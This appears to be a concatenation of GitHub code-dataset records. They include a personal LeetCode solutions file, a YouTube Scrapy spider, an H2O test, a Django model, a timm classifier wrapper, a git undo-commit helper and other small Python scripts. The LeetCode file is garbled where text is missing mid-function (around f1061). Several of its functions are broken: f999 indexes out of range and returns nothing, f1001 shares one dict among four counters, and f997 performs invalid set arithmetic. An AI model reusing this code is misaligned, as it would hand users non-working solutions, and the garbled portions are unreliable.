0, 0, []\n while i < len(a) and j < len(b):\n if a[i][1] < b[j][0]:\n i += 1\n elif b[j][1] < a[i][0]:\n j += 1\n else:\n res.append([max(a[i][0], b[j][0]), min(a[i][1], b[j][1])])\n if a[i][1] > b[j][1]:\n j += 1\n else:\n i += 1\n return res\n\ndef f986_2(a, b):\n c = sorted(a+b, key=lambda x: x[0])\n res = []\n for i in range(1, len(c)):\n if c[i-1][1] < c[i][0]:\n continue\n else:\n res.append([c[i][0], min(c[i-1][1], c[i][1])])\n \n return res\n\n###############################\n\ndef f912_quicksort(N):\n if len(N) < 2:\n return N\n pivot = random.choice(N)\n lt = [v for v in N if v < pivot]\n eq = [v for v in N if v == pivot]\n gt = [v for v in N if v > pivot]\n \n return f912_quicksort(lt) + eq + f912_quicksort(gt)\n\ndef f912_insertsort(N):\n for i in range(1, len(N)):\n key = N[i]\n j = i - 1\n while j >= 0 and key < N[j]:\n N[j+1] = N[j]\n j -= 1\n N[j+1] = key\n return N\n\n\ndef f913_mergesort(N):\n def merge(A, B):\n c = []\n while A and B:\n c.append(A.pop(0)) if A[0] < B[0] else c.append(B.pop(0))\n return c + (A or B)\n \n n = len(N)\n return N if n < 2 else merge(f913_mergesort(N[:n//2]), f913_mergesort(N[n//2:]))\n\n\n###############################\n\nimport functools\n\ndef f1101(self,logs):\n \n def findp(res,a,b):\n for i in range(len(res)):\n if a in res[i] or b in res[i]:\n res[i].add(a)\n res[i].add(b)\n break\n else:\n res.append({a,b})\n #print(res)\n #check if there is a common person across all groups\n #if there is, this is the first time all people got connected\n return functools.reduce(lambda a,b:a&b, res)\n \n logs = sorted(logs,key=lambda x: x[0]) #sort by timestamp\n \n res=[{logs[0][1],logs[0][2]}]\n for k in range(1, len(logs)):\n if findp(res,logs[k][1],logs[k][2]):\n return logs[k][0]\n return -1\n\n\n\np = {} # p is the parent dict\ndef find(x):\n while p[x] != x:\n p[x] = p[p[x]]\n x = p[x]\n return p[x]\ndef union(x, y):\n p[x] = p.setdefault(x, x)\n p[y] = p.setdefault(y, y)\n print(p, find(x), find(y))\n p[find(x)] = find(y)\n\nunion((0,1,2,3),(3,4,5))\nprint(p)\n\n#{(0, 1, 2, 3): (0, 1, 2, 3), (3, 4, 5): (3, 4, 5)} (0, 1, 2, 3) (3, 4, 5)\n#{(0, 1, 2, 3): (3, 4, 5), (3, 4, 5): (3, 4, 5)}\n###############################\n\ndef f791(S, T):\n return ''.join(sorted(T, key=lambda x: S.find(x)))\n\n###############################\n\ndef f1110(root, to_delete):\n to_del = set(to_delete)\n res = []\n def helper(root, is_root):\n if not root:\n return None\n 
root_deleted = root.val in to_del\n if is_root and not root_deleted:\n res.append(root)\n root.left = helper(root.left, root_deleted)\n root.right = helper(root.right,root_deleted)\n return None if root_deleted else root\n \n helper(root, True)\n return res\n\n###############################\n\ndef f959(self, grid):\n f = {}\n def find(x):\n f.setdefault(x, x)\n if x != f[x]:\n f[x] = find(f[x])\n return f[x]\n def union(x, y):\n f[find(x)] = find(y)\n\n for i in range(len(grid)):\n for j in range(len(grid)):\n if i: # i > 0 union to the top area\n union((i - 1, j, 2), (i, j, 0))\n if j: # j > 0 union to the left area\n union((i, j - 1, 1), (i, j, 3))\n if grid[i][j] != \"/\":\n union((i, j, 0), (i, j, 1))\n union((i, j, 2), (i, j, 3))\n if grid[i][j] != \"\\\\\":\n union((i, j, 3), (i, j, 0))\n union((i, j, 1), (i, j, 2))\n return len(set(map(find, f)))\n\n\n###############################\n\n\n#To get dp[i], we will try to change k last numbers separately to the maximum of them,\n\ndef f1043(A, K):\n n = len(A)\n dp = [0] * n\n curMax = 0\n for i in range(n):\n if i < K: \n curMax = max(curMax, A[i])\n dp[i] = curMax * (i + 1)\n else:\n curMax = 0\n for j in range(1, K + 1):\n curMax = max(A[i - j + 1], curMax)\n dp[i] = max(dp[i], dp[i - j] + curMax * j)\n return dp[n - 1]\n\n\n\ndef f1043_2(A, K):\n N = len(A)\n dp = [0] * (N + 1)\n for i in range(N):\n curMax = 0\n for k in range(1, min(K, i + 1) + 1):\n curMax = max(curMax, A[i - k + 1])\n dp[i] = max(dp[i], dp[i - k] + curMax * k)\n return dp[N - 1]\n\n###############################\n\ndef f969(A):\n res = []\n for x in range(len(A), 1, -1):\n i = A.index(x)\n res.extend([i+1, x])\n A = A[:i:-1] + A[:i]\n return res\n\n###############################\n\n\ndef f1061(A, B, S):\n f = {}\n def find(x):\n f.setdefault(x, x)\n if x != f[x]:\n f[x] = find(f[x])\n return f[x]\n def union(x, y):\n if find(x) < find(y):\n f[find(y)] = find(x)\n else:\n f[find(x)] = find(y)\n #########\n p = dict()\n def find1(c):\n p.setdefault(c,c)\n if c!=p[c]:\n p[c]=find(p[c])\n return p[c]\n\n def union1(a,b):\n c1,c2=find(a),find(b)\n if(c1=j: return 0\n if j==i+1 and j < len(piles): return piles[i]\n if (i,j) in cache: return cache[i,j]\n res = max(piles[i]+min(firstscore(i+2,j), firstscore(i+1,j-1)) , piles[j-1] + min(firstscore(i+1,j-1), firstscore(i,j-2)))\n cache[i,j] = res\n return res\n\n Alex = firstscore(0,len(piles))\n Lee = sum(piles) - Alex\n return Alex > Lee\n\n\n###############################\n\ndef f107(root):\n res = []\n if not root:\n return res\n q = collections.deque([root])\n while q:\n rec = []\n for i in range(len(q)):\n node = q.popleft()\n rec.append(node.val)\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n res.append(rec)\n return res[::-1]\n\n###############################\n\n###############################\n \ndef f103(root):\n res = []\n if not root:\n return res\n q=collections.deque([root])\n level = 1\n while q:\n rec = []\n for i in range(len(q)):\n node = q.popleft()\n rec.append(node.val)\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n if level%2: res.append(rec)\n else: res.append(rec[::-1])\n level += 1\n \n return res\n\n###############################\n\ndef f542(M):\n m, n = len(M), len(M[0])\n q = collections.deque([])\n visited = set()\n for i in range(m):\n for j in range(n):\n if M[i][j] == 0:\n q.append((i, j))\n visited.add((i, j))\n while q:\n i, j = q.popleft()\n for x, y in [(i+1,j),(i-1,j),(i,j-1),(i,j+1)]:\n if 0<=x= K and A[i-K] == 2: #when 
window moves forward, reduce its cur by minus those flips falling out behind the window\n cur -= 1\n if (cur % 2) == A[i]: # cur is even and A[i] == 0 or cur is odd and A[i] == 1\n if i + K > len(A):\n return -1\n A[i] = 2\n cur, res = cur + 1, res + 1\n return res\n\n\n###############################\n\ndef f1001(N, lamps, queries):\n lampon = set()\n rowon = colon = diagTL = diagBL = dict()\n for r, c in lamps:\n lampon.add((r,c))\n rowon[r] += 1\n colon[c] += 1\n diagTL[c-r] += 1\n diagBL[c+r-N] += 1\n res = []\n for r, c in queries:\n if rowon[r] > 0 or colon[c] > 0 or diagTL[c-r] > 0 or diagBL[c+r-N] >0:\n res.append(1)\n else:\n res.append(0)\n for dx in [-1,0,1]:\n for dy in [-1,0,1]:\n x, y = r+dx, c+dy\n if (x, y) in lampon:\n rowon[r] -= 1\n colon[c] -= 1\n diagTL[c-r] -= 1\n diagBL[c+r-N] -= 1\n lampon.remove((r,c))\n return res\n\n###############################\n\ndef ff654(nums):\n if not nums:\n return None\n i = nums.index(max(nums))\n node = TreeNode(nums[i])\n node.left = ff654(nums[:i])\n node.right = ff654(nums[i+1:])\n \n return node\n \n###############################\n \ndef f998(root, val):\n if not root: return TreeNode(val)\n if val > root.val:\n node = TreeNode(val)\n node.left = root\n return node\n else:\n root.right = f998(root.right, val)\n return root\n \ndef f998_2(root, val):\n pre, cur = None, root\n while cur and cur.val > val:\n pre, cur = cur, cur.right\n node = TreeNode(val)\n node.left = cur\n if pre: pre.right = node\n return root if root.val > val else node\n \n###############################\n\ndef f999(board):\n rook, m, n = [], len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[m][n] == 'R':\n rook.append([i, j])\n i, j = m, n\n \n res = 0\n x0, y0 = rook.pop()\n for i, j in [[0,-1],[-1,0],[0,1],[1,0]]:\n x, y = i + x0, j + y0\n while 0 <= x < m and 0 <= y < n:\n if board[x][y] == 'p': res += 1\n if board[x][y] != '.': break\n x, y = x + i, y + j\n return \n\n###############################\n\n\ndef f997(N, trust):\n dic, map = collections.defaultdict(list), set()\n for i, j in trust:\n if not dic[i]:\n dic[i].append(j)\n map.add(j)\n return map - dic.keys() + 1\n \ndef f997_2(N, trust):\n count = [0] * (N + 1)\n for i, j in trust:\n count[i] -= 1\n count[j] += 1\n for i in range(1, N + 1):\n if count[i] == N - 1:\n return i\n return -1\n\n\n###############################\n\ndef f992(A, K):\n def helper(A, K):\n i, res = 0, 0\n d = collections.Counter()\n for j in range(len(A)):\n d[A[j]] += 1\n if d[A[j]] == 1: \n K -= 1\n \n while K < 0: #while there are more than K distinct char \n d[A[i]] -= 1\n if d[A[i]] == 0:\n K += 1\n i += 1 #remove the char from the left side\n res += j - i + 1 #get the window sides == the number of new substring\n return res\n return helper(A, K) - helper(A, K-1)\n \ndef f992_2(A, K):\n def atMostK(A, K):\n count = collections.Counter()\n res = i = 0\n for j in range(len(A)):\n if count[A[j]] == 0: K -= 1\n count[A[j]] += 1\n while K < 0:\n count[A[i]] -= 1\n if count[A[i]] == 0: K += 1\n i += 1\n res += j - i + 1\n return res\n return atMostK(A, K) - atMostK(A, K - 1)\n \n\n###############################\n\ndef f991(X, Y):\n if X >= Y:\n return X - Y\n res = 0\n while X < Y:\n if Y % 2 == 1:\n Y += 1\n res += 1\n Y //= 2\n res += 1\n return res + X - Y\n\n#The difference between DP and greedy is: Greedy algo requires that the result of the whole question is \n# determined by the result of sub-question. 
For this question, \n# we can prove that f(X, Y) = f(X, Y/2) + 1, if Y is even or f(X, Y + 1) + 1 if Y is odd. \n# Therefore, it could be solved simply by greedy algorithm. \n# If you consider it as a dp problem, the formula should be f(X, Y) = min(f(2X, Y), f(X-1, Y)) + 1. \n# If you want to calculate f(X, Y), you need to calculate f(2X, Y) and f(X-1, Y).\n\n\n\n###############################\n\n\n\n", "repo_name": "frankwirgit/leet_code", "sub_path": "leet_m_level.py", "file_name": "leet_m_level.py", "file_ext": "py", "file_size_in_byte": 33259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "string.ascii_letters", "line_number": 38, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 38, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 46, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 114, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 145, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 183, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 393, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 700, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 746, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 934, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 953, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 972, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 992, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1013, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 1041, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1047, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1065, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 1071, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 1081, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1087, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1142, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 1162, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 1270, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1293, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1310, "usage_type": "call"}]} +{"seq_id": "4075738888", "text": "import scrapy\nimport random\nimport time\nfrom scrapy_selenium import SeleniumRequest\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass YtchannelSpider(scrapy.Spider):\n name = \"ytChannel\"\n allowed_domains = [\"www.youtube.com\"]\n # start_urls = [\"https://www.youtube.com/\"]\n\n def start_requests(self):\n urls = [\"https://www.youtube.com/channel/UCmreSJkj5C2L3BpJsZ7ikvQ/videos\",\n \"https://www.youtube.com/c/SellyTwitch/videos\",\n \"https://www.youtube.com/channel/UCVUmDq4aZ8_gzfCGiRO9KgA/videos\",\n \"https://www.youtube.com/channel/UCPwDQ6L9s6r1LDS753kpCHQ\"\n ]\n\n for url in urls:\n yield SeleniumRequest(url=url, callback=self.parse, wait_time=random.uniform(5, 10), wait_until=EC.presence_of_element_located((By.ID, 
\"page-manager\")))\n # yield SeleniumRequest(url=\"https://www.youtube.com/channel/UCVUmDq4aZ8_gzfCGiRO9KgA/videos\", callback=self.parse, wait_time=random.uniform(5, 10), wait_until=EC.presence_of_element_located((By.ID, \"page-manager\")))\n\n def parse(self, response):\n videosTitle = response.css(\n \"h3.ytd-grid-video-renderer a::text\").get()\n videosLink = response.css(\n \"h3.ytd-grid-video-renderer a.ytd-grid-video-renderer::attr(href)\").get()\n videosImage = response.css(\n \"ytd-thumbnail.ytd-grid-video-renderer yt-img-shadow.ytd-thumbnail img::attr(src)\").get()\n videosStatus = response.css(\n \"ytd-thumbnail-overlay-time-status-renderer.ytd-thumbnail::attr(overlay-style)\").get()\n videosChannelName = response.css(\n \"yt-formatted-string.ytd-channel-name::text\").get()\n metaData = response.css(\n \"div.ytd-grid-video-renderer span.ytd-grid-video-renderer::text\").getall()\n\n videoLinkParse = str(videosLink).split(\"=\", 1)\n videosID = videoLinkParse[1]\n\n videosViews = None\n videosUploadedTime = None\n\n for i in range(len(metaData)):\n if i < 1:\n videosViews = metaData[i]\n videosUploadedTime = metaData[i+1]\n videoItem = {\n \"videoID\": videosID,\n \"videoTitle\": videosTitle,\n \"videoLink\": f\"https://www.youtube.com{videosLink}\",\n \"videoImage\": videosImage,\n \"videoStatus\": videosStatus,\n \"videoViews\": videosViews,\n \"videoChannelName\": videosChannelName,\n \"videoUploadedTime\": videosUploadedTime\n }\n\n yield videoItem\n", "repo_name": "Weitingchien/Scrapy", "sub_path": "collector/collector/spiders/ytChannel.py", "file_name": "ytChannel.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scrapy_selenium.SeleniumRequest", "line_number": 23, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "29088921902", "text": "from datetime import datetime, timedelta\n\ndef compute_prev_date(dates_list:list):\n \"\"\"\n This method takes in a list of dates \n and returns a list with the corresponding \n previous days of the dates in the input list.\n The output list has a different format from \n the input list. 
\n \"\"\"\n #Converts the list of string into datetime\n format_list = [datetime.strptime(d,'%Y-%m-%d') for d in dates_list ]\n\n #computes the previous date of the dates contained in the dates list\n previous_list = [datetime.date(d) - timedelta(1) for d in format_list ]\n\n #prints the previous day list in the specified format\n print( [datetime.strftime(d,'%d %b %Y') for d in previous_list])\n\n#prints the dates previous day in the specified format\ndate_list = ['1999-01-21', '2022-12-30', '2099-09-17']\ncompute_prev_date(date_list)", "repo_name": "sphezulu/Platnum_Life_Software_Developer_Internship--initial-upload", "sub_path": "Round1/question3_list_comprehension.pyt", "file_name": "question3_list_comprehension.pyt", "file_ext": "pyt", "file_size_in_byte": 843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "13350665274", "text": "\nimport h2o\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\nfrom tests import pyunit_utils\n\n\ndef pubdev_5023_rm_metalearner():\n # Import a sample binary outcome dataset into H2O\n data = h2o.import_file(pyunit_utils.locate(\"smalldata/higgs/higgs_train_10k.csv\"))\n\n # Identify predictors and response\n x = data.columns\n y = \"response\"\n x.remove(y)\n\n # For binary classification, response should be a factor\n data[y] = data[y].asfactor()\n gbm_h2o = H2OGradientBoostingEstimator(learn_rate=0.1, max_depth=4)\n gbm_h2o.train(x=x, y=y, training_frame=data)\n\n try: # try to access metalearner method for GBM should encounter exception\n print(type(gbm_h2o.metalearner()))\n exit(1) # should have failed the test\n except Exception as ex:\n print(ex)\n\n\n # test for method metalearner() can be found in pyunit_stackedensemble_regression.py\n # test for method levelone_frame_id() can be found in pyunit_stackedensemble_levelone_frame.py\n # There is no need to add one here.\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_5023_rm_metalearner)\nelse:\n pubdev_5023_rm_metalearner()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_jira/pyunit_pubdev_5023_rm_metalearner.py", "file_name": "pyunit_pubdev_5023_rm_metalearner.py", "file_ext": "py", "file_size_in_byte": 1175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.import_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 10, "usage_type": "name"}, {"api_name": "h2o.estimators.gbm.H2OGradientBoostingEstimator", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 34, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 34, "usage_type": "name"}]}
+{"seq_id": "10685190001", "text": "from django.db import models\nfrom product.models 
import Product\nfrom customer.models import Customer\nfrom stock.models import Stock\nfrom datetime import datetime\n\n\nclass Order(models.Model):\n stock = models.ForeignKey(\n Stock, on_delete=models.DO_NOTHING, verbose_name=\"Product\")\n customer = models.ForeignKey(\n Customer, on_delete=models.DO_NOTHING, verbose_name=\"Customer\")\n quantity = models.IntegerField(blank=True, default=0, verbose_name=\"Quantity\")\n quantity_unit = models.CharField(\n max_length=20, blank=True, default='kilogram', verbose_name='Quantity unit')\n price = models.DecimalField(\n decimal_places=2, max_digits=10,\n blank=True, default=0.0, verbose_name='Unit price')\n total_price = models.DecimalField(\n decimal_places=2, max_digits=10,\n blank=True, default=0.0, verbose_name='Total price')\n time_on_order = models.DateTimeField(blank=True, default=datetime.now)\n\n class Meta:\n verbose_name = \"Order\"\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.stock\n", "repo_name": "hujiyi/mystore", "sub_path": "order/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "stock.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "stock.models.Stock", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.DO_NOTHING", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "customer.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 11, "usage_type": "call"}, {"api_name": "customer.models.Customer", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.DO_NOTHING", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "72324632833", "text": "from typing import List\nfrom collections import defaultdict, deque\n\n# 1.24 first try, got it working after debugging\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n graph = defaultdict(list)\n 
count = [0] * numCourses\n res = []\n q = deque()\n\n # build graph & count indegree\n for c, req in prerequisites:\n graph[req].append(c)\n count[c] += 1\n # push 0 indegree nodes into the queue\n for i, v in enumerate(count):\n if v == 0:\n q.append(i)\n while q:\n req = q.popleft()\n res.append(req)\n for c in graph[req]:\n count[c] -= 1\n if count[c] == 0:\n q.append(c)\n # graph[req].remove(c) # originally had this line and kept failing; removing it from the graph is unnecessary\n # return res if len(res) == numCourses else []\n return res if len(res) == numCourses else []", "repo_name": "deezeey/LC", "sub_path": "src/solutions/210_course-schedule-ii.py", "file_name": "210_course-schedule-ii.py", "file_ext": "py", "file_size_in_byte": 1021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "6315163949", "text": "# Code written by Kadir Nar, 2023\n\nimport urllib.request\n\nimport timm\nimport torch\nfrom PIL import Image\nfrom timm.data import resolve_data_config\nfrom timm.data.transforms_factory import create_transform\n\n\nclass TimmClassificationModel:\n def __init__(\n self,\n model_name: str,\n ):\n self.model_name = model_name\n self.load()\n\n def load_model(self):\n self.model = timm.create_model(self.model_name, pretrained=True)\n self.model.eval()\n\n def load_classes(self):\n url, filename = (\n \"https://raw.githubusercontent.com/pytorch/hub/master/imagenet_classes.txt\",\n \"imagenet_classes.txt\",\n )\n urllib.request.urlretrieve(url, filename)\n with open(\"imagenet_classes.txt\", \"r\") as f:\n self.categories = [s.strip() for s in f.readlines()]\n\n def load_transform(self):\n config = resolve_data_config({}, model=self.model)\n self.transform = create_transform(**config)\n\n def load(self):\n self.load_model()\n self.load_transform()\n self.load_classes()\n\n def predict(self, img_path):\n img = Image.open(img_path).convert(\"RGB\")\n tensor = self.transform(img).unsqueeze(0)\n with torch.no_grad():\n out = self.model(tensor)\n probabilities = torch.nn.functional.softmax(out[0], dim=0)\n top5_prob, top5_catid = torch.topk(probabilities, 5)\n\n return [(self.categories[top5_catid[i]], top5_prob[i].item()) for i in range(top5_prob.size(0))]\n", "repo_name": "kadirnar/classifyhub", "sub_path": "classifyhub/libhub/timm_models.py", "file_name": "timm_models.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "timm.create_model", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "attribute"}, {"api_name": "timm.data.resolve_data_config", "line_number": 34, "usage_type": "call"}, {"api_name": "timm.data.transforms_factory.create_transform", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": 
"torch.topk", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "7525085665", "text": "import git\nfrom .add import git_unadd\n\ndef uncommit():\n try:\n # Initialize a git object for the current directory\n repo = git.Repo(\".\")\n \n # Check the number of commits\n num_commits = len(list(repo.iter_commits()))\n \n if num_commits > 1:\n # Get the last commit message\n last_commit_message = repo.head.commit.message\n \n # Perform the soft reset\n repo.git.reset(\"--soft\", \"HEAD~1\")\n git_unadd()\n \n print(f\"Successfully undone '{last_commit_message}'.\")\n elif num_commits == 1:\n # Get the last commit message\n last_commit_message = repo.head.commit.message\n \n # Delete the last commit\n repo.git.update_ref(\"-d\", \"HEAD\")\n git_unadd()\n \n print(f\"Successfully deleted the only commit '{last_commit_message}'.\")\n else:\n print(\"No commits to undo.\")\n \n except git.InvalidGitRepositoryError:\n print(\"You're not in a Git repository.\")\n except git.GitCommandError as e:\n print(f\"Failed to undo the last commit. Error: {e}\")\n\nif __name__ == \"__main__\":\n uncommit()\n\n", "repo_name": "brainspoof/goodgit", "sub_path": "goodgit/commit/uncommit.py", "file_name": "uncommit.py", "file_ext": "py", "file_size_in_byte": 1242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "git.Repo", "line_number": 7, "usage_type": "call"}, {"api_name": "add.git_unadd", "line_number": 18, "usage_type": "call"}, {"api_name": "add.git_unadd", "line_number": 27, "usage_type": "call"}, {"api_name": "git.InvalidGitRepositoryError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "git.GitCommandError", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "40066211907", "text": "import sys\nimport itertools as it\nimport numpy as np\nfrom pypot.creatures import PoppyHumanoid as PH\n\nperiod = 10**6\nph = PH()\nnames = [m.name for m in ph.motors]\n\ntry:\n for i in it.count():\n for t in range(period): pass\n\n load = [m.present_load for m in ph.motors]\n voltage = [m.present_voltage for m in ph.motors]\n temperature = [m.present_temperature for m in ph.motors]\n\n print(\"\\n%d\" % i)\n print(\"load = %.2f-%.2f (%s-%s)\" % (\n np.min(load), np.max(load), names[np.argmin(load)], names[np.argmax(load)]))\n print(\"volt = %.2f-%.2f (%s-%s)\" % (\n np.min(voltage), np.max(voltage), names[np.argmin(voltage)], names[np.argmax(voltage)]))\n print(\"temp = %.2f-%.2f (%s-%s)\" % (\n np.min(temperature), np.max(temperature), names[np.argmin(temperature)], names[np.argmax(temperature)]))\n\nexcept:\n ph.close()\n sys.exit()\n\n", "repo_name": "garrettkatz/poppy-muffin", "sub_path": "scripts/monitor_load.py", "file_name": "monitor_load.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pypot.creatures.PoppyHumanoid", "line_number": 7, "usage_type": "call"}, {"api_name": "itertools.count", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 
22, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "2880276114", "text": "import bson, logging, os, gridfs, py, pymongo\nfrom bson.objectid import ObjectId\n\nfrom pymongo.errors import OperationFailure\nfrom pytransact.difftoi import DiffTOI\nfrom pytransact import commit, mongo\nfrom pytransact.contextbroker import ContextBroker\nfrom pytransact.exceptions import *\nfrom pytransact.object.attribute import BlobVal\nfrom pytransact.testsupport import ContextTests, Fake, RuntimeContext, Time\nimport blm\n\ndef setup_module(mod):\n from blm import fundamental\n mod.blm = blm\n blm.addBlmPath(os.path.join(os.path.dirname(__file__), 'blm'))\n from blm import testcommit\n\n logging.basicConfig()\n commit.log.setLevel(logging.DEBUG)\n\ndef teardown_module(mod):\n blm.removeBlmPath(os.path.join(os.path.dirname(__file__), 'blm'))\n blm.clear()\n\n\nclass BaseCommitContextTests(ContextTests):\n\n def setup_method(self, method):\n super(BaseCommitContextTests, self).setup_method(method)\n with RuntimeContext(self.database):\n self.user = 